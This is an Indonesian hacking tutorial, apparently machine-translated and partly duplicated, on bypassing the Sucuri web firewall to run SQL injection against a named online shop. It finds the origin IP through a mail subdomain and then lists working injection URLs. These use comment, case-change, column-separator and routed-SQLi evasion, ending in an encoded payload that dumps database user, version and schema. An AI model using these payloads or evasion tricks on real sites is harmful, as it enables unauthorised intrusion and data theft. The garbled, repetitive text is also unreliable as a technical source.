Bypass Sucurity WebSite Firewall (WAF)
Oleh
chmood
Halo semua, dalam tutorial ini kita akan melewati terbaru WAF Sucurity. Yang menjadi sakit di pantat untuk banyak Inj3ct0rs. Berikut adalah pendekatan saya akan gunakan dalam tutorial ini. Aku tidak akan menjelaskan salah satu pendekatan ini secara mendalam karena mereka atau akan dijelaskan dalam Panduan untuk WAF Bypass oleh Anon@sniper Security.
Dalam Tutorial ini kita akan menggunakan metode Bypass berikut untuk Bypass WAF
Campur Kasus ke Bypass Kasus Filter Sensitif
Jadi kita memiliki dua pendekatan yang berbeda untuk memotong itu. Pendekatan pertama kami ke Sucuri WAF memotong akan "Ninja Cara untuk memotong WAF" di mana kita akan menemukan sebuah backdoor siluman dan benar-benar menghindari menghadapi WAF dan menyerang target kami dari tempat sekitar yang ia tidak pernah memikirkan. Terutama serangan Surprize, korban tidak punya pilihan selain untuk meletakkan senjata.
Pendekatan kedua kami akan "Daya Pendekatan" harap Anda tahu apa yang saya maksud. Di sini kita akan Bypass WAF seperti Boss, dalam pendekatan ini kita akan memecah langsung melalui WAF dan menyerang Aplikasi di atasnya wajah. Hell Yeah !!!
Jadi mari kita mulai dengan yang pertama. Berikut seperti yang Anda lihat di atas penyerang di satu sisi WAF di antara dan kemudian server. Sekarang hanya berpikir Server adalah hidup dan harus memiliki hidup IP isnt itu. Apa yang kita dapatkan bahwa hidup IP dan mengirim Injection kami langsung ke IP atau Gunung Server untuk IP itu, yang akan memungkinkan permintaan kami untuk menghindari WAF dan mencapai langsung ke server. Ledakan!! kami IN. Tapi sekarang pertanyaannya adalah bagaimana untuk mendapatkan alamat IP, baik ada banyak cara yang saya akan membahas dalam panduan memotong WAF kami tapi tidak di sini. Sebagai yang tidak tutorial di mana kami akan menjelaskan semuanya dan membahas semua pendekatan. Di sini kita akan pergi Point to Point untuk memotong Firewall ini.
Kami akan menggunakan situs ini untuk memulai dengan "http://www.mbtagifts.com/shop.php?c=4" mari kita mulai. Kami akan menggunakan subdomain email untuk menemukan IP nyata dan menyuntikkan situs. Ping ke "mail.mbtagifts.com" Anda akan mendapatkan IP "50.28.71.142". Sekarang mount IP dalam file Host atau proxy atau yang lain Anda dapat langsung menggunakan IP untuk menyuntikkan situs ini. Di sini saya akan menggunakan:
http://50.28.71.142/shop.php?c=4'
http://50.28.71.142/shop.php?c=4' order by 31--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,concat%0a(0x4e616d65203a3a205a656e3c62723e55
736572203a3a20,user(),0x3c62723e4462203a3a20,Database(),0
x3c62723e56657273696f6e203a3a20,version(),0x3c62723e),7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
Yakin reaksi Anda tentang hal ini akan menjadi:
Tapi tidak begitu bersemangat begitu awal. Itu adalah cara siluman Ninja. Sekarang mari kita asumsikan ia pergi begitu buruk bahwa kita tidak bisa mendapatkan Server IP Langsung, sekarang kita berada dalam situasi untuk menerobos WAR untuk menyuntikkan. Mari kita mendapatkan lebih dengan itu sudah. Membaca URL di bawah Sarana terdeteksi dan sarana lainnya dilewati.
No WAF Yet
Sekarang kita harus mencetak output, mencetak seluruh output dan melewati hal-hal lain bisa menjadi sakit sehingga memungkinkan pertama kali mencoba "Routed SQL Injection", Anda dapat membaca Routed SQLi jika Anda tidak tahu apa itu. Jadi ketika saya mulai pengujian seperti yang ditunjukkan di bawah ini:
No Error
No Error
And so i came to Sixth column and got an Extra error.
Confirming Routed Query
Sekarang sebagai yang dikonfirmasi saya menemukan ada 25 kolom: Berikutnya adalah menyuntikkan Routed Injection:
Cek di sumber Anda akan melihat ini 13.374 dicetak di sumber, Sekarang suntik DIOS di kolom keempat dan penggalian Output:
Sucurity dock Bypass suplemen: D
Dalam Tutorial ini kita akan menggunakan metode Bypass berikut untuk Bypass WAF
Gunung Asal Server untuk Bypass Proxfied WAF
Mengomentari dan Inline komentar
Encoding URL
Campur Kasus ke Bypass Kasus Filter Sensitif
Kolom Separator WAF memotong
Routed SQLi ke Bypass WAF
Seperti Sucuri WAF adalah proxy antara Anda dan server Web, seperti yang ditunjukkan pada layar.
Jadi kita memiliki dua pendekatan yang berbeda untuk memotong itu. Pendekatan pertama kami ke Sucuri WAF memotong akan "Ninja Cara untuk memotong WAF" di mana kita akan menemukan sebuah backdoor siluman dan benar-benar menghindari menghadapi WAF dan menyerang target kami dari tempat sekitar yang ia tidak pernah memikirkan. Terutama serangan Surprize, korban tidak punya pilihan selain untuk meletakkan senjata.
Pendekatan kedua kami akan "Daya Pendekatan" harap Anda tahu apa yang saya maksud. Di sini kita akan Bypass WAF seperti Boss, dalam pendekatan ini kita akan memecah langsung melalui WAF dan menyerang Aplikasi di atasnya wajah. Hell Yeah !!!
Jadi mari kita mulai dengan yang pertama. Berikut seperti yang Anda lihat di atas penyerang di satu sisi WAF di antara dan kemudian server. Sekarang hanya berpikir Server adalah hidup dan harus memiliki hidup IP isnt itu. Apa yang kita dapatkan bahwa hidup IP dan mengirim Injection kami langsung ke IP atau Gunung Server untuk IP itu, yang akan memungkinkan permintaan kami untuk menghindari WAF dan mencapai langsung ke server. Ledakan!! kami IN. Tapi sekarang pertanyaannya adalah bagaimana untuk mendapatkan alamat IP, baik ada banyak cara yang saya akan membahas dalam panduan memotong WAF kami tapi tidak di sini. Sebagai yang tidak tutorial di mana kami akan menjelaskan semuanya dan membahas semua pendekatan. Di sini kita akan pergi Point to Point untuk memotong Firewall ini.
Kami akan menggunakan situs ini untuk memulai dengan "http://www.mbtagifts.com/shop.php?c=4" mari kita mulai. Kami akan menggunakan subdomain email untuk menemukan IP nyata dan menyuntikkan situs. Ping ke "mail.mbtagifts.com" Anda akan mendapatkan IP "50.28.71.142". Sekarang mount IP dalam file Host atau proxy atau yang lain Anda dapat langsung menggunakan IP untuk menyuntikkan situs ini. Di sini saya akan menggunakan:
http://50.28.71.142/shop.php?c=4'
http://50.28.71.142/shop.php?c=4' order by 31--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,concat%0a(0x4e616d65203a3a205a656e3c62723e55
736572203a3a20,user(),0x3c62723e4462203a3a20,Database(),0
x3c62723e56657273696f6e203a3a20,version(),0x3c62723e),7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
Yakin reaksi Anda tentang hal ini akan menjadi:
Tapi tidak begitu bersemangat begitu awal. Itu adalah cara siluman Ninja. Sekarang mari kita asumsikan ia pergi begitu buruk bahwa kita tidak bisa mendapatkan Server IP Langsung, sekarang kita berada dalam situasi untuk menerobos WAR untuk menyuntikkan. Mari kita mendapatkan lebih dengan itu sudah. Membaca URL di bawah Sarana terdeteksi dan sarana lainnya dilewati.
http://www.mbtagifts.com/shop.php?c=4
http://www.mbtagifts.com/shop.php?c=4'-- -
http://www.mbtagifts.com/shop.php?c=4' order by 10-- -
Order by Bypassed using Comments
http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a20-- -
Columns Found
http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a30-- -
http://www.mbtagifts.com/shop.php?c=4' union select-- -
http://www.mbtagifts.com/shop.php?c=4' union distinctrow select%23
Sucuri Bypassed Now WAF 2nd
http://www.mbtagifts.com/shop.php?c=4'*2e9union select!1%23
Second WAF Bypassed using case change
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1%23
Now have to add 30 Columns
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2%23
No WAF Yet
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10%23Bypassed
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23
WAF after 20 columns lets use Columns seperator Style WAF bypass
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25%23
30 Columns Done
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23
Sekarang kita harus mencetak output, mencetak seluruh output dan melewati hal-hal lain bisa menjadi sakit sehingga memungkinkan pertama kali mencoba "Routed SQL Injection", Anda dapat membaca Routed SQLi jika Anda tidak tahu apa itu. Jadi ketika saya mulai pengujian seperti yang ditunjukkan di bawah ini:
No Error
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,0x27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
~20,21,22,23,24,25,26,27,28,29,30%23
No Error
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,0x27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
~20,21,22,23,24,25,26,27,28,29,30%23
And so i came to Sixth column and got an Extra error.
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x27,7,8,9,10,11,12,13,14,15,16,17,18,19,
~20,21,22,23,24,25,26,27,28,29,30%23
Confirming Routed Query
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123,7
,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23
Sekarang sebagai yang dikonfirmasi saya menemukan ada 25 kolom: Berikutnya adalah menyuntikkan Routed Injection:
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454
3542031333337312c31333337322c31333337332c313333373
42c31333337352c31333337362c31333337372c3133333738
2c31333337392c3133333731302c3133333731312c3133333
731322c3133333731332c3133333731342c3133333731352c3
133333731362c3133333731372c3133333731382c313333373
1392c3133333732302c3133333732312c3133333732322c3133
333732332c3133333732342c31333337323523,7,8,9,10,11,12,
13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23
Cek di sumber Anda akan melihat ini 13.374 dicetak di sumber, Sekarang suntik DIOS di kolom keempat dan penggalian Output:
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454
35420312c322c332c636f6e6361742830783237336533
6332663631336533633266373436343365336332663734
373233653363326637343631363236633635336534653631
366436353230336133613230356136353665336336323732
3365353537333635373232303361336132302c7573657228
292c3078336336323732336534343632323033613361
32302c446174616261736528292c3078336336323732336
5353636353732373336393666366532303361336132302c76
657273696f6e28292c307833633632373233652c6d616
b655f73657428362c403a3d307830612c2873656c656374283
12966726f6d28696e666f726d6174696f6e5f736368656d612e
636f6c756d6e73297768657265287461626c655f736368656d61
213d3078363936653636366637323664363137343639366
63665356637333633363836353664363129616e64403a3d6
d616b655f736574283531312c402c307833633663363933
652c7461626c655f6e616d652c636f6c756d6e5f6e616d6529
292c4029292c352c362c372c382c392c31302c31312c313
22c31332c31342c31352c31362c31372c31382c31392c32302c3
2312c32322c32332c32342c323523,7,8,9,10,11,12,13,14,15,16,1
7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23
Sucurity dock Bypass suplemen: D
Komentar